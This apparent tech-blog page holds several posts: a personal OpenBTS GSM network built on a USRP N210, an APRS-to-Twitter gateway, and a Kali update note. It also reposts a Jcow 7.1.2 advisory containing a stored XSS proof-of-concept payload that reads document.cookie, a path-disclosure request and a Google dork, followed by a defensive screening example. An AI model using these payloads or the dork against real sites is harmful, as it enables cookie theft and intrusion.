Projeto TI

Coming Soon: #cpbr7!

Written By x86_g on 2013-10-26 | 8:36 AM


A super-powered geek event is coming once again to shake up our heads!
I'm wired until January; a lot of coffee will flow until the Big Day!!!

I paid 160.5 in total without the tent; I got a tent through a colleague and will pay 35 reais more!
Let's go!!!!

A day with my personal GSM network

Written By x86_g on 2013-10-22 | 4:46 PM

A couple of months ago I bought a USRP N210 from Ettus Research (www.ettus.com), and I had not had time to test what it can do until today. I have big plans for this SDR and another one I also own, the QS1R, but today I will talk only about this fine piece of hardware, the USRP N210.

The above picture shows the USRP N210 with the RFX900 board and the Basic RX and Basic TX boards. The WBX board is already mounted inside. Here are the frequencies:
WBX – 50 MHz to 2.2 GHz, one Rx, one Tx – 100 mW output
RFX900 – 800 MHz to 1 GHz, one Rx, one Tx – 200+ mW output
Basic RX, Basic TX – made to be interfaced with external RF hardware
What am I going to use the USRP N210 for?
I am interested in using SDR for Tetra decoding, GSM decoding, radar, and what else? The ADC and DAC of the boards run at 100 Msps, which gives pretty good spectrum bandwidth. It’s amazing how many people use this SDR and how many applications are out there on the web, so I decided to test a couple of them before starting to change the FPGA and firmware. The good news is that Matlab can work directly with the USRP N210. This is really great news.
The board works great in conjunction with GNUradio (www.gnuradio.org) open source software and uses the new UHD (Universal Hardware Driver). Some of the applications one could find on the web are written for non-UHD USRP and do need converting to UHD.
I decided to see what I could run in one day of the weekend, so here it is: OpenBTS, an open source GSM software. And a WFM receiver as a plus. I won’t go into details on what I did to configure various bits since everything worked out of the box without too much tweaking. I’ll only point out where documentation is available on the web so that you’ll have a starting point.
1. You need a 1 Gbps network card in your PC. The USRP N210 comes with address 192.168.10.2. I then configured the PC’s eth interface with IP 192.168.10.1, netmask 255.255.255.0.
2. Installed the UHD driver from git: http://code.ettus.com/redmine/ettus/projects/uhd/wiki
Test whether the USRP N210 is found with uhd_find_devices. It won’t show the serial number unless you install the latest firmware.
3. Installed the latest FW and FPGA images with usrp_n2xx_net_burner.py
Test the connection with uhd_find_devices and uhd_usrp_probe.
4. Installed gnuradio: www.gnuradio.org
You need to satisfy all dependencies in order to be able to run GRC examples.
6. Installed Asterisk (I’m using Ubuntu 10.04) and added all Asterisk configs from OpenBTS to /etc/asterisk/
7. Ran Asterisk, OpenBTS and smqueue. Searching manually for GSM networks, I discovered a new network (I used ARFCN 51 on the GSM900 band). Connected to the network.
8. Found my phone’s IMSI: sent an SMS message to 411 and got the reply with the phone’s IMSI.
9. Add a phone number to the related IMSI in the sip.conf and add a SIP rule in the extensions.conf
10. Now when I send an empty SMS to 411 I get also the phone number together with IMSI.
11. To verify that the phone is connected to the network, send an SMS to 101 with the phone number in the body. You’ll get a reply saying the phone is registered.
12. Now I’m able to do phone calls and SMSs between the two phones I have with the arbitrarily chosen numbers 2101 and 2102.
13. To be able to see various GSM messages on the Um interface, I installed the latest version of Wireshark, which knows GSMTAP and is able to show what the USRP board transmits and receives.
OpenBTS is a nice tool to play with even though it is not production ready. It helps me a lot in learning how GSM works.
One tool used together with USRP N210 was Kalibrate which not only helps in calibrating the USRP clocks by using the neighbor networks but also scans the local environment and prints what it finds:
kal -s 900
GSM-900:
chan: 18 (938.6MHZ + 14.186kHz) power 18032.11
chan: 22(939.4Mhz + 14.288kHz) power 3554.23
FM radio test
GNU Radio comes with a graphical IDE called GRC (GNU Radio Companion) that speeds up the process of creating various SDR projects. I found the OZ9AEC page (http://www.oz9aec.net/index.php/gnu-radio/grc-examples) where a couple of working GRC examples are presented. They are also converted to UHD, so it is just a matter of running GRC to see what it’s all about. One comment about GRC: when building gnuradio one needs to bring in all the dependencies so that all Wx and Qt widgets will be in the release. Here are the screenshots of an FM receiver implemented in GRC:
As a conclusion, I like this new USRP N210 and, as I said, I’m planning to write a lot of code for it to implement my ideas. One thing on the down side is that in order to build the FPGA image one needs a tool from Altera that is not free and if you add this to the price of the board … On the good side I love the openness of gnuradio, the integration with Matlab and the options that Ettus offers through their large list of daughter cards.

Sending APRS message to Twitter

Just in a discussion with a fellow motorcyclist, I found out that people want to send Twitter messages (to tweet – a new verb :) ) from various kinds of devices like PDAs, phones, radios. Knowing that APRS could be used to send short messages that are even shorter than Twitter ones made me think: why shouldn’t I make an application to allow ham radio enthusiasts to send APRS messages to their own Twitter accounts? This seemed to be an easy task, just a couple of days of work. For the impatient, here is the link to what you need:
I saw two subtasks to accomplish the main task of sending the message from APRS to Twitter: authentication and message passing between the two networks.
There are some differences between Twitter and APRS when it comes to authentication. APRS has no authentication; Twitter has good authentication as of 2010, OAuth.
Message passing is easily accomplished once the authentication is done: the application just needs to listen on a connection to one of the main APRS-IS servers and, when it receives a message, send it to the Twitter server.
How it works:
Authentication is done in a Perl CGI that receives the user’s callsign and then proceeds to authentication with Twitter. You’ll be asked to accept access from the APRS to Tweet application. Once the authentication is finished, the user’s callsign and Twitter OAuth tokens are stored in a local database. Remember that with OAuth the application does not at any time know your Twitter user name and password, therefore no such info is stored on the server.
Sending the message to Twitter is simple: you send the message from APRS to callsign YO3IIU-11, and it is mandatory that the message has “tweet:” at the beginning. Otherwise the message will be rejected. It is designed like this just to filter out broadcast messages that will come to YO3IIU-11.
That’s all folks,
73, YO3IIU
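
The gateway-side filtering described in this post, as an added example that is not the author's Perl code: it parses APRS-IS message packets, applies the YO3IIU-11 addressee and "tweet:" prefix rules, and looks the sender up in a set standing in for the token database. The function names, the sample lines and the choice to key registrations on the callsign without SSID are assumptions; because APRS has no authentication, the source callsign checked here is whatever the packet claims.

```python
import re

GATEWAY = "YO3IIU-11"   # gateway callsign (from the post)
PREFIX = "tweet:"       # mandatory message prefix (from the post)

# APRS-IS (TNC2) message packet: SRC>DEST,PATH::ADDRESSEE:text{msgno
# ADDRESSEE is a fixed 9-character field, space padded.
MSG_RE = re.compile(r"^([A-Z0-9]{1,6}(?:-[A-Z0-9]{1,2})?)>[^:]*::(.{9}):(.*)$")

def parse_message(line):
    """Return (source, addressee, text) for a message packet, else None."""
    m = MSG_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    src, addressee, text = m.groups()
    return src, addressee.rstrip(), text.split("{", 1)[0]  # drop message number

def route(line, registered):
    """Decide what the gateway does with one line from APRS-IS.

    registered: callsigns that completed the OAuth step; stands in for
    the local database. Keying on the callsign without SSID is an assumption.
    """
    parsed = parse_message(line)
    if parsed is None:
        return ("ignore", "not a message packet")
    src, addressee, text = parsed
    if addressee != GATEWAY:
        return ("ignore", "not addressed to the gateway")
    if not text.startswith(PREFIX):
        return ("reject", "missing tweet: prefix")
    callsign = src.split("-", 1)[0]
    if callsign not in registered:
        return ("reject", "callsign not registered")
    # APRS carries no proof that `src` is genuine: the callsign is the only key.
    return ("tweet", callsign, text[len(PREFIX):].strip())

# Constructed sample lines (not captured traffic).
SAMPLES = [
    "N0CALL-7>APRS,TCPIP*,qAC,T2TEST::YO3IIU-11:tweet:hello from the road{42",
    "N0CALL-7>APRS,TCPIP*,qAC,T2TEST::YO3IIU-11:hello",
    "N0CALL>APRS,TCPIP*,qAC,T2TEST:!4903.50N/07201.75W-Test",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(route(sample, {"N0CALL"}))
```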


Kali 1.0.5 released

Written By x86_g on 2013-09-05 | 12:53 PM

The day is full of news on the blog and this is the third post. Here we go.
Kali 1.0.5 is out, bringing a series of new features and fixes. I won't go into depth explaining that Kali is a security-focused Linux distribution that came to replace BackTrack.
The updates and fixes in this new release can be found at the following link, and if you are using it but on an older version, just run the commands below to update it:
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade
Use it in moderation :)

Source: Coruja de Ti.

Jcow 7.1.2 XSS/FPD Vulnerabilities

[+] Site            : 1337day.com
I'm DaOne member from Inj3ct0r Team
---------------------------------------------------
# Exploit Title: Jcow 7.1.2 XSS/FPD Vulnerabilities
# Author: DaOne aka MockingBird
# Vendor Homepage: http://www.jcow.net/
# Category: webapps/php
# Version: 7.1.2
# Google dork: "Powered by Jcow 7.1.2"
---------------------------------------------------
 
[#] [XSS]
the application does not validate the 'tags' parameter {/index.php?p=streampublish}
script code would execute in {/index.php?p=videos/viewstory/*id*}
 
-PoC-
POST /jcow.7.1.2.ce/index.php?p=streampublish HTTP/1.1
 
page_id=1&oncomment=0&page_type=u&message=Share+with+your+followers...&video_title=DaOne&description=tst&tags="><ScRiPT>alert(document.cookie)</ScRiPT>&youtube_url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DErCAOMi5EGM&youtubeid=&attachment=videos
 
 
 
[#] [Full Path Disclosure]
POST /jcow.7.1.2.ce/index.php?p=member/loginpost HTTP/1.1
 
username[]=tst&password=tst
 
 
                                        /jcow.7.1.2.ce/includes/libs/apps.inc.php
                                        /jcow.7.1.2.ce/includes/libs/u.module.php
                                        /jcow.7.1.2.ce/modules/admin/admin.php
                                        /jcow.7.1.2.ce/modules/apps/apps.php
                                        /jcow.7.1.2.ce/themes/default/home.tpl.php
 
# FE3F5F237889B11D   1337day.com [2013-09-05]   C2E397F31D91D749 #
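
As an added example (not part of the advisory and not Jcow code), a request screen and an output encoder a defender could apply to the two routes named above: it flags login fields sent as arrays and markup characters in 'tags', and shows the encoding the view page should apply when rendering a stored tags value. The field lists, function names and sample inputs are assumptions.

```python
import html
from urllib.parse import parse_qs, parse_qsl, urlsplit

# Fields each route is assumed to expect as plain strings
# (route names taken from the advisory).
SCALAR_FIELDS = {
    "member/loginpost": {"username", "password"},
    "streampublish": {"tags", "video_title", "description"},
}
MARKUP = set("<>\"'")

def screen(url, body):
    """Return a list of findings for one POST to index.php?p=<route>."""
    route = parse_qs(urlsplit(url).query).get("p", [""])[0]
    expected = SCALAR_FIELDS.get(route, set())
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        name = key.split("[", 1)[0]
        if name not in expected:
            continue
        if "[" in key:
            # e.g. username[]=... where the application expects a string
            findings.append(f"{route}: '{name}' sent as array ({key})")
        if route == "streampublish" and name == "tags" and MARKUP & set(value):
            findings.append(f"{route}: markup characters in 'tags'")
    return findings

def render_tags(tags):
    """Encode a stored tags value for HTML output on the view page."""
    return html.escape(tags, quote=True)

if __name__ == "__main__":
    # Constructed requests; the tags value is a harmless markup sample.
    print(screen("/jcow.7.1.2.ce/index.php?p=member/loginpost",
                 "username[]=tst&password=tst"))
    print(screen("/jcow.7.1.2.ce/index.php?p=streampublish",
                 'video_title=t&tags="><b>x</b>&attachment=videos'))
    print(render_tags('"><b>x</b>'))
```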